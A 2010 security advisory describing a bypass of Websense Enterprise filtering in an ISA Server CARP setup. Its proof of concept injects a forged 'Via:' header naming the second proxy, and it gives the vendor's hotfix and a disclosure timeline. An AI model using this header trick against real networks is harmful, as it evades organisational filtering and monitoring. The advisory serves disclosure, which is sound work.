Websense/ISA "Via:" Bypass Redux

discovered by mrhinkydink

PRODUCT: Websense Enterprise

EXPOSURE: Trivial Web Policy Bypass (III)


SYNOPSIS
========

On May 29, 2010 I demonstrated that by adding a "Via:" header to an HTTP request it is possible for a user to completely bypass filtering and monitoring in a Websense Enterprise 6.3.3/Microsoft ISA Server (2004 or 2006) proxy integration environment. This was addressed in Websense Knowledge Base article #5117.

However, anyone familiar with the Via bypass technique would have noticed this remediation was insufficient.


PROOF OF CONCEPT
================

The following works in a Websense Enterprise system using the ISA Server integration product in a Cache Array Routing Protocol (CARP, sometimes referred to as "CRAP") configuration, which requires at least two ISA servers.

Assuming there a two ISA servers configured as per Websense Knowledge Base article #5117, one at IP address 10.10.0.1 and another at 10.10.0.2, perform the following:

I. Install Firefox >= 3.5

II. Configure Firefox to use one of the proxy servers in the CARP array (10.10.0.1).

III. Obtain and install the Modify Headers plug-in by Gareth Hunt

IV. Configure the plug-in to add a valid "Via:" header pointing to the other server in the array.

    Example: "Via: 1.0 10.10.0.2"

V. Browse to a filtered Web site

VI. All content is allowed without monitoring or filtering


PoC RESTRICTIONS
================

All restrictions of the original Via Bypass article apply.

See http://mrhinkydink.blogspot.com/2010/05/websense-633-via-bypass.html

OTHER USES
==========

Limited only by your imagination! You do have an imagination, don't you?

See http://mrhinkydink.blogspot.com/2010/05/websense-633-via-bypass.html


WORK-AROUNDS
============

Install Hotfix 17 provided by Websense.

HISTORY
=======

06/25/2010 - vendor notified

08/13/2010 - vendor releases Hotfix 17

08/18/2010 - PoC published



c. MMX mrhinkydink